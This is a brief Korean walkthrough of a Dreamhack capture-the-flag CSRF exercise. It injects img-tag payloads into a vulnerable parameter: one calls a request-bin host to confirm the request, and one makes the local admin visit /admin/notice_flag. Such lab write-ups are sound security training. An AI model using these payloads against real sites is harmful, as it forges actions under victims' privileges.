# Exercise: CSRF

1. `<img>` 태그를 사용해 테스트베드 URL에 접속하는 공격 코드를 작성한 뒤, 취약점이 발생하는 페이지에 해당 코드를 삽입
    
    http://host3.dreamhack.games:10895/vuln?param<img%20src=”https://tmlkjmn.request.dreamhack.games”>
    

![Untitled](Exercise%20CSRF%200510611263204b8b9f16965a40da585e/Untitled.png)

1. 그럼 다음과 같이 이미지 에러와 함께 CSRF 공격코드 삽입 응답 결과를 확인할 수 있다.
    
    ![Untitled](Exercise%20CSRF%200510611263204b8b9f16965a40da585e/Untitled%201.png)
    
2. 로컬호스트에 위치하는 이용자가 `/admin/notice_flag` 페이지를 방문하도록 해야하기 때문에 아래와 같이 공격 코드를 작성 → 로컬호스트에서 `http://127.0.0.1:8000/vuln?param=<img src="/admin/notice_flag?userid=admin"/>`에 접속
    
    <img src="/admin/notice_flag?userid=admin" />
    
    ![Untitled](Exercise%20CSRF%200510611263204b8b9f16965a40da585e/Untitled%202.png)
    
3. **memo** 페이지에 접근하면 앞서 수행한 CSRF 공격으로 관리자가 `/admin/notice_flag`
 페이지를 방문한 것을 확인

![Untitled](Exercise%20CSRF%200510611263204b8b9f16965a40da585e/Untitled%203.png)